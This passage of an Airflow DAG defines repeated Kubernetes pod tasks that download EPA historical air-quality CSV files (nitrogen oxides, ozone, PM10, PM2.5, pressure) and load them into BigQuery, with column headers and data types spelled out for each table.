# Run CSV transform within kubernetes pod
nonoxnoy_hourly_summary = kubernetes_engine.GKEStartPodOperator(
task_id="nonoxnoy_hourly_summary",
startup_timeout_seconds=600,
name="load_data",
namespace="default",
project_id="{{ var.value.gcp_project }}",
location="us-central1-c",
cluster_name="epa-hist-air-quality",
image_pull_policy="Always",
image="{{ var.json.epa_historical_air_quality.container_registry.run_csv_transform_kub }}",
env_vars={
"SOURCE_URL": "{{ var.json.epa_historical_air_quality.nonoxnoy_hourly_summary.source_url }}",
"START_YEAR": "1990",
"SOURCE_FILE": "files/data.csv",
"PROJECT_ID": "{{ var.value.gcp_project }}",
"DATASET_ID": "{{ var.json.epa_historical_air_quality.dataset_id }}",
"TABLE_ID": "{{ var.json.epa_historical_air_quality.nonoxnoy_hourly_summary.table_id }}",
"YEAR_FIELD_NAME": "date_local",
"YEAR_FIELD_TYPE": "DATETIME",
"SCHEMA_PATH": "{{ var.json.epa_historical_air_quality.nonoxnoy_hourly_summary.schema_path }}",
"CHUNKSIZE": "{{ var.json.epa_historical_air_quality.nonoxnoy_hourly_summary.chunk_size }}",
"TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
"TARGET_GCS_PATH": "{{ var.json.epa_historical_air_quality.nonoxnoy_hourly_summary.target_gcs_path }}",
"PIPELINE_NAME": "epa_historical_air_quality - nonoxnoy_hourly",
"INPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "date_local",\n "time_local", "date_gmt", "time_gmt", "sample_measurement", "units_of_measure",\n "mdl", "uncertainty", "qualifier", "method_type", "method_code", "method_name",\n "state_name", "county_name", "date_of_last_change" ]',
"DATA_DTYPES": '{ "state_code": "str", "county_code": "str", "site_num": "str", "parameter_code": "int32", "poc": "int32",\n "latitude": "float64", "longitude": "float64", "datum": "str", "parameter_name": "str", "date_local": "datetime64[ns]",\n "time_local": "str", "date_gmt": "datetime64[ns]", "time_gmt": "str", "sample_measurement": "float64", "units_of_measure": "str",\n "mdl": "float64", "uncertainty": "float64", "qualifier": "str", "method_type": "str", "method_code": "int32", "method_name": "str",\n "state_name": "str", "county_name": "str", "date_of_last_change": "datetime64[ns]" }',
"OUTPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "date_local",\n "time_local", "date_gmt", "time_gmt", "sample_measurement", "units_of_measure",\n "mdl", "uncertainty", "qualifier", "method_type", "method_code", "method_name",\n "state_name", "county_name", "date_of_last_change" ]',
},
resources={"request_ephemeral_storage": "16G", "request_cpu": "1"},
)
# Run CSV transform within kubernetes pod
ozone_daily_summary = kubernetes_engine.GKEStartPodOperator(
task_id="ozone_daily_summary",
startup_timeout_seconds=600,
name="load_data",
namespace="default",
project_id="{{ var.value.gcp_project }}",
location="us-central1-c",
cluster_name="epa-hist-air-quality",
image_pull_policy="Always",
image="{{ var.json.epa_historical_air_quality.container_registry.run_csv_transform_kub }}",
env_vars={
"SOURCE_URL": "{{ var.json.epa_historical_air_quality.ozone_daily_summary.source_url }}",
"START_YEAR": "1990",
"SOURCE_FILE": "files/data.csv",
"PROJECT_ID": "{{ var.value.gcp_project }}",
"DATASET_ID": "{{ var.json.epa_historical_air_quality.dataset_id }}",
"TABLE_ID": "{{ var.json.epa_historical_air_quality.ozone_daily_summary.table_id }}",
"YEAR_FIELD_NAME": "date_local",
"YEAR_FIELD_TYPE": "DATETIME",
"SCHEMA_PATH": "{{ var.json.epa_historical_air_quality.ozone_daily_summary.schema_path }}",
"CHUNKSIZE": "{{ var.json.epa_historical_air_quality.ozone_daily_summary.chunk_size }}",
"TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
"TARGET_GCS_PATH": "{{ var.json.epa_historical_air_quality.ozone_daily_summary.target_gcs_path }}",
"PIPELINE_NAME": "epa_historical_air_quality - ozone_daily_summary",
"INPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "sample_duration",\n "pollutant_standard", "date_local", "units_of_measure", "event_type", "observation_count",\n "observation_percent", "arithmetic_mean", "first_max_value", "first_max_hour", "aqi",\n "method_code", "method_name", "local_site_name", "address", "state_name",\n "county_name", "city_name", "cbsa_name", "date_of_last_change" ]',
"DATA_DTYPES": '{ "state_code": "str", "county_code": "str", "site_num": "str", "parameter_code": "int32", "poc": "int32",\n "latitude": "float64", "longitude": "float64", "datum": "str", "parameter_name": "str", "sample_duration": "str",\n "pollutant_standard": "str", "date_local": "datetime64[ns]", "units_of_measure": "str", "event_type": "str", "observation_count": "int32",\n "observation_percent": "float64", "arithmetic_mean": "float64", "first_max_value": "float64", "first_max_hour": "int32", "aqi": "str",\n "method_code": "str", "method_name": "str", "local_site_name": "str", "address": "str", "state_name": "str",\n "county_name": "str", "city_name": "str", "cbsa_name": "str", "date_of_last_change": "datetime64[ns]" }',
"OUTPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "sample_duration",\n "pollutant_standard", "date_local", "units_of_measure", "event_type", "observation_count",\n "observation_percent", "arithmetic_mean", "first_max_value", "first_max_hour", "aqi",\n "method_code", "method_name", "local_site_name", "address", "state_name",\n "county_name", "city_name", "cbsa_name", "date_of_last_change" ]',
},
resources={"request_ephemeral_storage": "16G", "request_cpu": "1"},
)
# Run CSV transform within kubernetes pod
ozone_hourly_summary = kubernetes_engine.GKEStartPodOperator(
task_id="ozone_hourly_summary",
startup_timeout_seconds=600,
name="load_data",
namespace="default",
project_id="{{ var.value.gcp_project }}",
location="us-central1-c",
cluster_name="epa-hist-air-quality",
image_pull_policy="Always",
image="{{ var.json.epa_historical_air_quality.container_registry.run_csv_transform_kub }}",
env_vars={
"SOURCE_URL": "{{ var.json.epa_historical_air_quality.ozone_hourly_summary.source_url }}",
"START_YEAR": "1980",
"SOURCE_FILE": "files/data.csv",
"PROJECT_ID": "{{ var.value.gcp_project }}",
"DATASET_ID": "{{ var.json.epa_historical_air_quality.dataset_id }}",
"TABLE_ID": "{{ var.json.epa_historical_air_quality.ozone_hourly_summary.table_id }}",
"YEAR_FIELD_NAME": "date_local",
"YEAR_FIELD_TYPE": "DATETIME",
"SCHEMA_PATH": "{{ var.json.epa_historical_air_quality.ozone_hourly_summary.schema_path }}",
"CHUNKSIZE": "{{ var.json.epa_historical_air_quality.ozone_hourly_summary.chunk_size }}",
"TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
"TARGET_GCS_PATH": "{{ var.json.epa_historical_air_quality.ozone_hourly_summary.target_gcs_path }}",
"PIPELINE_NAME": "epa_historical_air_quality - ozone_hourly_summary",
"INPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "date_local",\n "time_local", "date_gmt", "time_gmt", "sample_measurement", "units_of_measure",\n "mdl", "uncertainty", "qualifier", "method_type", "method_code", "method_name",\n "state_name", "county_name", "date_of_last_change" ]',
"DATA_DTYPES": '{ "state_code": "str", "county_code": "str", "site_num": "str", "parameter_code": "int32", "poc": "int32",\n "latitude": "float64", "longitude": "float64", "datum": "str", "parameter_name": "str", "date_local": "datetime64[ns]",\n "time_local": "str", "date_gmt": "datetime64[ns]", "time_gmt": "str", "sample_measurement": "float64", "units_of_measure": "str",\n "mdl": "float64", "uncertainty": "float64", "qualifier": "str", "method_type": "str", "method_code": "int32", "method_name": "str",\n "state_name": "str", "county_name": "str", "date_of_last_change": "datetime64[ns]" }',
"OUTPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "date_local",\n "time_local", "date_gmt", "time_gmt", "sample_measurement", "units_of_measure",\n "mdl", "uncertainty", "qualifier", "method_type", "method_code", "method_name",\n "state_name", "county_name", "date_of_last_change" ]',
},
resources={"request_ephemeral_storage": "16G", "request_cpu": "1"},
)
# Run CSV transform within kubernetes pod
pm10_daily_summary = kubernetes_engine.GKEStartPodOperator(
task_id="pm10_daily_summary",
startup_timeout_seconds=600,
name="load_data",
namespace="default",
project_id="{{ var.value.gcp_project }}",
location="us-central1-c",
cluster_name="epa-hist-air-quality",
image_pull_policy="Always",
image="{{ var.json.epa_historical_air_quality.container_registry.run_csv_transform_kub }}",
env_vars={
"SOURCE_URL": "{{ var.json.epa_historical_air_quality.pm10_daily_summary.source_url }}",
"START_YEAR": "1990",
"SOURCE_FILE": "files/data.csv",
"PROJECT_ID": "{{ var.value.gcp_project }}",
"DATASET_ID": "{{ var.json.epa_historical_air_quality.dataset_id }}",
"TABLE_ID": "{{ var.json.epa_historical_air_quality.pm10_daily_summary.table_id }}",
"YEAR_FIELD_NAME": "date_local",
"YEAR_FIELD_TYPE": "DATETIME",
"SCHEMA_PATH": "{{ var.json.epa_historical_air_quality.pm10_daily_summary.schema_path }}",
"CHUNKSIZE": "{{ var.json.epa_historical_air_quality.pm10_daily_summary.chunk_size }}",
"TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
"TARGET_GCS_PATH": "{{ var.json.epa_historical_air_quality.pm10_daily_summary.target_gcs_path }}",
"PIPELINE_NAME": "epa_historical_air_quality - pm10_daily_summaries",
"INPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "sample_duration",\n "pollutant_standard", "date_local", "units_of_measure", "event_type", "observation_count",\n "observation_percent", "arithmetic_mean", "first_max_value", "first_max_hour", "aqi",\n "method_code", "method_name", "local_site_name", "address", "state_name",\n "county_name", "city_name", "cbsa_name", "date_of_last_change" ]',
"DATA_DTYPES": '{ "state_code": "str", "county_code": "str", "site_num": "str", "parameter_code": "int32", "poc": "int32",\n "latitude": "float64", "longitude": "float64", "datum": "str", "parameter_name": "str", "sample_duration": "str",\n "pollutant_standard": "str", "date_local": "datetime64[ns]", "units_of_measure": "str", "event_type": "str", "observation_count": "int32",\n "observation_percent": "float64", "arithmetic_mean": "float64", "first_max_value": "float64", "first_max_hour": "int32", "aqi": "str",\n "method_code": "str", "method_name": "str", "local_site_name": "str", "address": "str", "state_name": "str",\n "county_name": "str", "city_name": "str", "cbsa_name": "str", "date_of_last_change": "datetime64[ns]" }',
"OUTPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "sample_duration",\n "pollutant_standard", "date_local", "units_of_measure", "event_type", "observation_count",\n "observation_percent", "arithmetic_mean", "first_max_value", "first_max_hour", "aqi",\n "method_code", "method_name", "local_site_name", "address", "state_name",\n "county_name", "city_name", "cbsa_name", "date_of_last_change" ]',
},
resources={"request_ephemeral_storage": "16G", "request_cpu": "1"},
)
# Run CSV transform within kubernetes pod
pm10_hourly_summary = kubernetes_engine.GKEStartPodOperator(
task_id="pm10_hourly_summary",
startup_timeout_seconds=600,
name="load_data",
namespace="default",
project_id="{{ var.value.gcp_project }}",
location="us-central1-c",
cluster_name="epa-hist-air-quality",
image_pull_policy="Always",
image="{{ var.json.epa_historical_air_quality.container_registry.run_csv_transform_kub }}",
env_vars={
"SOURCE_URL": "{{ var.json.epa_historical_air_quality.pm10_hourly_summary.source_url }}",
"START_YEAR": "1990",
"SOURCE_FILE": "files/data.csv",
"PROJECT_ID": "{{ var.value.gcp_project }}",
"DATASET_ID": "{{ var.json.epa_historical_air_quality.dataset_id }}",
"TABLE_ID": "{{ var.json.epa_historical_air_quality.pm10_hourly_summary.table_id }}",
"YEAR_FIELD_NAME": "date_local",
"YEAR_FIELD_TYPE": "DATETIME",
"SCHEMA_PATH": "{{ var.json.epa_historical_air_quality.pm10_hourly_summary.schema_path }}",
"CHUNKSIZE": "{{ var.json.epa_historical_air_quality.pm10_hourly_summary.chunk_size }}",
"TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
"TARGET_GCS_PATH": "{{ var.json.epa_historical_air_quality.pm10_hourly_summary.target_gcs_path }}",
"PIPELINE_NAME": "epa_historical_air_quality - pm10_hourly_summaries",
"INPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "date_local",\n "time_local", "date_gmt", "time_gmt", "sample_measurement", "units_of_measure",\n "mdl", "uncertainty", "qualifier", "method_type", "method_code", "method_name",\n "state_name", "county_name", "date_of_last_change" ]',
"DATA_DTYPES": '{ "state_code": "str", "county_code": "str", "site_num": "str", "parameter_code": "int32", "poc": "int32",\n "latitude": "float64", "longitude": "float64", "datum": "str", "parameter_name": "str", "date_local": "datetime64[ns]",\n "time_local": "str", "date_gmt": "datetime64[ns]", "time_gmt": "str", "sample_measurement": "float64", "units_of_measure": "str",\n "mdl": "float64", "uncertainty": "float64", "qualifier": "str", "method_type": "str", "method_code": "int32", "method_name": "str",\n "state_name": "str", "county_name": "str", "date_of_last_change": "datetime64[ns]" }',
"OUTPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "date_local",\n "time_local", "date_gmt", "time_gmt", "sample_measurement", "units_of_measure",\n "mdl", "uncertainty", "qualifier", "method_type", "method_code", "method_name",\n "state_name", "county_name", "date_of_last_change" ]',
},
resources={"request_ephemeral_storage": "16G", "request_cpu": "1"},
)
# Run CSV transform within kubernetes pod
pm25_frm_hourly_summary = kubernetes_engine.GKEStartPodOperator(
task_id="pm25_frm_hourly_summary",
startup_timeout_seconds=600,
name="load_data",
namespace="default",
project_id="{{ var.value.gcp_project }}",
location="us-central1-c",
cluster_name="epa-hist-air-quality",
image_pull_policy="Always",
image="{{ var.json.epa_historical_air_quality.container_registry.run_csv_transform_kub }}",
env_vars={
"SOURCE_URL": "{{ var.json.epa_historical_air_quality.pm25_frm_hourly_summary.source_url }}",
"START_YEAR": "1980",
"SOURCE_FILE": "files/data.csv",
"PROJECT_ID": "{{ var.value.gcp_project }}",
"DATASET_ID": "{{ var.json.epa_historical_air_quality.dataset_id }}",
"TABLE_ID": "{{ var.json.epa_historical_air_quality.pm25_frm_hourly_summary.table_id }}",
"YEAR_FIELD_NAME": "date_local",
"YEAR_FIELD_TYPE": "DATETIME",
"SCHEMA_PATH": "{{ var.json.epa_historical_air_quality.pm25_frm_hourly_summary.schema_path }}",
"CHUNKSIZE": "{{ var.json.epa_historical_air_quality.pm25_frm_hourly_summary.chunk_size }}",
"TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
"TARGET_GCS_PATH": "{{ var.json.epa_historical_air_quality.pm25_frm_hourly_summary.target_gcs_path }}",
"PIPELINE_NAME": "epa_historical_air_quality - pm25_frm_hourly_summaries",
"INPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "date_local",\n "time_local", "date_gmt", "time_gmt", "sample_measurement", "units_of_measure",\n "mdl", "uncertainty", "qualifier", "method_type", "method_code", "method_name",\n "state_name", "county_name", "date_of_last_change" ]',
"DATA_DTYPES": '{ "state_code": "str", "county_code": "str", "site_num": "str", "parameter_code": "int32", "poc": "int32",\n "latitude": "float64", "longitude": "float64", "datum": "str", "parameter_name": "str", "date_local": "datetime64[ns]",\n "time_local": "str", "date_gmt": "datetime64[ns]", "time_gmt": "str", "sample_measurement": "float64", "units_of_measure": "str",\n "mdl": "float64", "uncertainty": "float64", "qualifier": "str", "method_type": "str", "method_code": "int32", "method_name": "str",\n "state_name": "str", "county_name": "str", "date_of_last_change": "datetime64[ns]" }',
"OUTPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "date_local",\n "time_local", "date_gmt", "time_gmt", "sample_measurement", "units_of_measure",\n "mdl", "uncertainty", "qualifier", "method_type", "method_code", "method_name",\n "state_name", "county_name", "date_of_last_change" ]',
},
resources={"request_ephemeral_storage": "16G", "request_cpu": "1"},
)
# Run CSV transform within kubernetes pod
pm25_nonfrm_daily_summary = kubernetes_engine.GKEStartPodOperator(
task_id="pm25_nonfrm_daily_summary",
startup_timeout_seconds=600,
name="load_data",
namespace="default",
project_id="{{ var.value.gcp_project }}",
location="us-central1-c",
cluster_name="epa-hist-air-quality",
image_pull_policy="Always",
image="{{ var.json.epa_historical_air_quality.container_registry.run_csv_transform_kub }}",
env_vars={
"SOURCE_URL": "{{ var.json.epa_historical_air_quality.pm25_nonfrm_daily_summary.source_url }}",
"START_YEAR": "1980",
"SOURCE_FILE": "files/data.csv",
"PROJECT_ID": "{{ var.value.gcp_project }}",
"DATASET_ID": "{{ var.json.epa_historical_air_quality.dataset_id }}",
"TABLE_ID": "{{ var.json.epa_historical_air_quality.pm25_nonfrm_daily_summary.table_id }}",
"YEAR_FIELD_NAME": "date_local",
"YEAR_FIELD_TYPE": "DATETIME",
"SCHEMA_PATH": "{{ var.json.epa_historical_air_quality.pm25_nonfrm_daily_summary.schema_path }}",
"CHUNKSIZE": "{{ var.json.epa_historical_air_quality.pm25_nonfrm_daily_summary.chunk_size }}",
"TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
"TARGET_GCS_PATH": "{{ var.json.epa_historical_air_quality.pm25_nonfrm_daily_summary.target_gcs_path }}",
"PIPELINE_NAME": "epa_historical_air_quality - pm25_nonfrm_daily_summaries",
"INPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "sample_duration",\n "pollutant_standard", "date_local", "units_of_measure", "event_type", "observation_count",\n "observation_percent", "arithmetic_mean", "first_max_value", "first_max_hour", "aqi",\n "method_code", "method_name", "local_site_name", "address", "state_name",\n "county_name", "city_name", "cbsa_name", "date_of_last_change" ]',
"DATA_DTYPES": '{ "state_code": "str", "county_code": "str", "site_num": "str", "parameter_code": "int32", "poc": "int32",\n "latitude": "float64", "longitude": "float64", "datum": "str", "parameter_name": "str", "sample_duration": "str",\n "pollutant_standard": "str", "date_local": "datetime64[ns]", "units_of_measure": "str", "event_type": "str", "observation_count": "int32",\n "observation_percent": "float64", "arithmetic_mean": "float64", "first_max_value": "float64", "first_max_hour": "int32", "aqi": "str",\n "method_code": "str", "method_name": "str", "local_site_name": "str", "address": "str", "state_name": "str",\n "county_name": "str", "city_name": "str", "cbsa_name": "str", "date_of_last_change": "datetime64[ns]" }',
"OUTPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "sample_duration",\n "pollutant_standard", "date_local", "units_of_measure", "event_type", "observation_count",\n "observation_percent", "arithmetic_mean", "first_max_value", "first_max_hour", "aqi",\n "method_code", "method_name", "local_site_name", "address", "state_name",\n "county_name", "city_name", "cbsa_name", "date_of_last_change" ]',
},
resources={"request_ephemeral_storage": "16G", "request_cpu": "1"},
)
# Run CSV transform within kubernetes pod
pm25_nonfrm_hourly_summary = kubernetes_engine.GKEStartPodOperator(
task_id="pm25_nonfrm_hourly_summary",
startup_timeout_seconds=600,
name="load_data",
namespace="default",
project_id="{{ var.value.gcp_project }}",
location="us-central1-c",
cluster_name="epa-hist-air-quality",
image_pull_policy="Always",
image="{{ var.json.epa_historical_air_quality.container_registry.run_csv_transform_kub }}",
env_vars={
"SOURCE_URL": "{{ var.json.epa_historical_air_quality.pm25_nonfrm_hourly_summary.source_url }}",
"START_YEAR": "1990",
"SOURCE_FILE": "files/data.csv",
"PROJECT_ID": "{{ var.value.gcp_project }}",
"DATASET_ID": "{{ var.json.epa_historical_air_quality.dataset_id }}",
"TABLE_ID": "{{ var.json.epa_historical_air_quality.pm25_nonfrm_hourly_summary.table_id }}",
"YEAR_FIELD_NAME": "date_local",
"YEAR_FIELD_TYPE": "DATETIME",
"SCHEMA_PATH": "{{ var.json.epa_historical_air_quality.pm25_nonfrm_hourly_summary.schema_path }}",
"CHUNKSIZE": "{{ var.json.epa_historical_air_quality.pm25_nonfrm_hourly_summary.chunk_size }}",
"TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
"TARGET_GCS_PATH": "{{ var.json.epa_historical_air_quality.pm25_nonfrm_hourly_summary.target_gcs_path }}",
"PIPELINE_NAME": "epa_historical_air_quality - pm25_nonfrm_hourly_summaries",
"INPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "date_local",\n "time_local", "date_gmt", "time_gmt", "sample_measurement", "units_of_measure",\n "mdl", "uncertainty", "qualifier", "method_type", "method_code", "method_name",\n "state_name", "county_name", "date_of_last_change" ]',
"DATA_DTYPES": '{ "state_code": "str", "county_code": "str", "site_num": "str", "parameter_code": "int32", "poc": "int32",\n "latitude": "float64", "longitude": "float64", "datum": "str", "parameter_name": "str", "date_local": "datetime64[ns]",\n "time_local": "str", "date_gmt": "datetime64[ns]", "time_gmt": "str", "sample_measurement": "float64", "units_of_measure": "str",\n "mdl": "float64", "uncertainty": "float64", "qualifier": "str", "method_type": "str", "method_code": "int32", "method_name": "str",\n "state_name": "str", "county_name": "str", "date_of_last_change": "datetime64[ns]" }',
"OUTPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "date_local",\n "time_local", "date_gmt", "time_gmt", "sample_measurement", "units_of_measure",\n "mdl", "uncertainty", "qualifier", "method_type", "method_code", "method_name",\n "state_name", "county_name", "date_of_last_change" ]',
},
resources={"request_ephemeral_storage": "16G", "request_cpu": "1"},
)
# Run CSV transform within kubernetes pod
pm25_speciation_daily_summary = kubernetes_engine.GKEStartPodOperator(
task_id="pm25_speciation_daily_summary",
startup_timeout_seconds=600,
name="load_data",
namespace="default",
project_id="{{ var.value.gcp_project }}",
location="us-central1-c",
cluster_name="epa-hist-air-quality",
image_pull_policy="Always",
image="{{ var.json.epa_historical_air_quality.container_registry.run_csv_transform_kub }}",
env_vars={
"SOURCE_URL": "{{ var.json.epa_historical_air_quality.pm25_speciation_daily_summary.source_url }}",
"START_YEAR": "1990",
"SOURCE_FILE": "files/data.csv",
"PROJECT_ID": "{{ var.value.gcp_project }}",
"DATASET_ID": "{{ var.json.epa_historical_air_quality.dataset_id }}",
"TABLE_ID": "{{ var.json.epa_historical_air_quality.pm25_speciation_daily_summary.table_id }}",
"YEAR_FIELD_NAME": "date_local",
"YEAR_FIELD_TYPE": "DATETIME",
"SCHEMA_PATH": "{{ var.json.epa_historical_air_quality.pm25_speciation_daily_summary.schema_path }}",
"CHUNKSIZE": "{{ var.json.epa_historical_air_quality.pm25_speciation_daily_summary.chunk_size }}",
"TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
"TARGET_GCS_PATH": "{{ var.json.epa_historical_air_quality.pm25_speciation_daily_summary.target_gcs_path }}",
"PIPELINE_NAME": "epa_historical_air_quality - pm25_speciation_daily_summaries",
"INPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "sample_duration",\n "pollutant_standard", "date_local", "units_of_measure", "event_type", "observation_count",\n "observation_percent", "arithmetic_mean", "first_max_value", "first_max_hour", "aqi",\n "method_code", "method_name", "local_site_name", "address", "state_name",\n "county_name", "city_name", "cbsa_name", "date_of_last_change" ]',
"DATA_DTYPES": '{ "state_code": "str", "county_code": "str", "site_num": "str", "parameter_code": "int32", "poc": "int32",\n "latitude": "float64", "longitude": "float64", "datum": "str", "parameter_name": "str", "sample_duration": "str",\n "pollutant_standard": "str", "date_local": "datetime64[ns]", "units_of_measure": "str", "event_type": "str", "observation_count": "int32",\n "observation_percent": "float64", "arithmetic_mean": "float64", "first_max_value": "float64", "first_max_hour": "int32", "aqi": "str",\n "method_code": "str", "method_name": "str", "local_site_name": "str", "address": "str", "state_name": "str",\n "county_name": "str", "city_name": "str", "cbsa_name": "str", "date_of_last_change": "datetime64[ns]" }',
"OUTPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "sample_duration",\n "pollutant_standard", "date_local", "units_of_measure", "event_type", "observation_count",\n "observation_percent", "arithmetic_mean", "first_max_value", "first_max_hour", "aqi",\n "method_code", "method_name", "local_site_name", "address", "state_name",\n "county_name", "city_name", "cbsa_name", "date_of_last_change" ]',
},
resources={"request_ephemeral_storage": "16G", "request_cpu": "1"},
)
# Run CSV transform within kubernetes pod
pm25_speciation_hourly_summary = kubernetes_engine.GKEStartPodOperator(
task_id="pm25_speciation_hourly_summary",
startup_timeout_seconds=600,
name="load_data",
namespace="default",
project_id="{{ var.value.gcp_project }}",
location="us-central1-c",
cluster_name="epa-hist-air-quality",
image_pull_policy="Always",
image="{{ var.json.epa_historical_air_quality.container_registry.run_csv_transform_kub }}",
env_vars={
"SOURCE_URL": "{{ var.json.epa_historical_air_quality.pm25_speciation_hourly_summary.source_url }}",
"START_YEAR": "1990",
"SOURCE_FILE": "files/data.csv",
"PROJECT_ID": "{{ var.value.gcp_project }}",
"DATASET_ID": "{{ var.json.epa_historical_air_quality.dataset_id }}",
"TABLE_ID": "{{ var.json.epa_historical_air_quality.pm25_speciation_hourly_summary.table_id }}",
"YEAR_FIELD_NAME": "date_local",
"YEAR_FIELD_TYPE": "DATETIME",
"SCHEMA_PATH": "{{ var.json.epa_historical_air_quality.pm25_speciation_hourly_summary.schema_path }}",
"CHUNKSIZE": "{{ var.json.epa_historical_air_quality.pm25_speciation_hourly_summary.chunk_size }}",
"TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
"TARGET_GCS_PATH": "{{ var.json.epa_historical_air_quality.pm25_speciation_hourly_summary.target_gcs_path }}",
"PIPELINE_NAME": "epa_historical_air_quality - pm25_speciation_hourly_summary",
"INPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "date_local",\n "time_local", "date_gmt", "time_gmt", "sample_measurement", "units_of_measure",\n "mdl", "uncertainty", "qualifier", "method_type", "method_code", "method_name",\n "state_name", "county_name", "date_of_last_change" ]',
"DATA_DTYPES": '{ "state_code": "str", "county_code": "str", "site_num": "str", "parameter_code": "int32", "poc": "int32",\n "latitude": "float64", "longitude": "float64", "datum": "str", "parameter_name": "str", "date_local": "datetime64[ns]",\n "time_local": "str", "date_gmt": "datetime64[ns]", "time_gmt": "str", "sample_measurement": "float64", "units_of_measure": "str",\n "mdl": "float64", "uncertainty": "float64", "qualifier": "str", "method_type": "str", "method_code": "int32", "method_name": "str",\n "state_name": "str", "county_name": "str", "date_of_last_change": "datetime64[ns]" }',
"OUTPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "date_local",\n "time_local", "date_gmt", "time_gmt", "sample_measurement", "units_of_measure",\n "mdl", "uncertainty", "qualifier", "method_type", "method_code", "method_name",\n "state_name", "county_name", "date_of_last_change" ]',
},
resources={"request_ephemeral_storage": "16G", "request_cpu": "1"},
)
# Run CSV transform within kubernetes pod
pressure_daily_summary = kubernetes_engine.GKEStartPodOperator(
task_id="pressure_daily_summary",
startup_timeout_seconds=600,
name="load_data",
namespace="default",
project_id="{{ var.value.gcp_project }}",
location="us-central1-c",
cluster_name="epa-hist-air-quality",
image_pull_policy="Always",
image="{{ var.json.epa_historical_air_quality.container_registry.run_csv_transform_kub }}",
env_vars={
"SOURCE_URL": "{{ var.json.epa_historical_air_quality.pressure_daily_summary.source_url }}",
"START_YEAR": "1990",
"SOURCE_FILE": "files/data.csv",
"PROJECT_ID": "{{ var.value.gcp_project }}",
"DATASET_ID": "{{ var.json.epa_historical_air_quality.dataset_id }}",
"TABLE_ID": "{{ var.json.epa_historical_air_quality.pressure_daily_summary.table_id }}",
"YEAR_FIELD_NAME": "date_local",
"YEAR_FIELD_TYPE": "DATETIME",
"SCHEMA_PATH": "{{ var.json.epa_historical_air_quality.pressure_daily_summary.schema_path }}",
"CHUNKSIZE": "{{ var.json.epa_historical_air_quality.pressure_daily_summary.chunk_size }}",
"TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
"TARGET_GCS_PATH": "{{ var.json.epa_historical_air_quality.pressure_daily_summary.target_gcs_path }}",
"PIPELINE_NAME": "epa_historical_air_quality - pressure_daily_summaries",
"INPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "sample_duration",\n "pollutant_standard", "date_local", "units_of_measure", "event_type", "observation_count",\n "observation_percent", "arithmetic_mean", "first_max_value", "first_max_hour", "aqi",\n "method_code", "method_name", "local_site_name", "address", "state_name",\n "county_name", "city_name", "cbsa_name", "date_of_last_change" ]',
"DATA_DTYPES": '{ "state_code": "str", "county_code": "str", "site_num": "str", "parameter_code": "int32", "poc": "int32",\n "latitude": "float64", "longitude": "float64", "datum": "str", "parameter_name": "str", "sample_duration": "str",\n "pollutant_standard": "str", "date_local": "datetime64[ns]", "units_of_measure": "str", "event_type": "str", "observation_count": "int32",\n "observation_percent": "float64", "arithmetic_mean": "float64", "first_max_value": "float64", "first_max_hour": "int32", "aqi": "str",\n "method_code": "str", "method_name": "str", "local_site_name": "str", "address": "str", "state_name": "str",\n "county_name": "str", "city_name": "str", "cbsa_name": "str", "date_of_last_change": "datetime64[ns]" }',
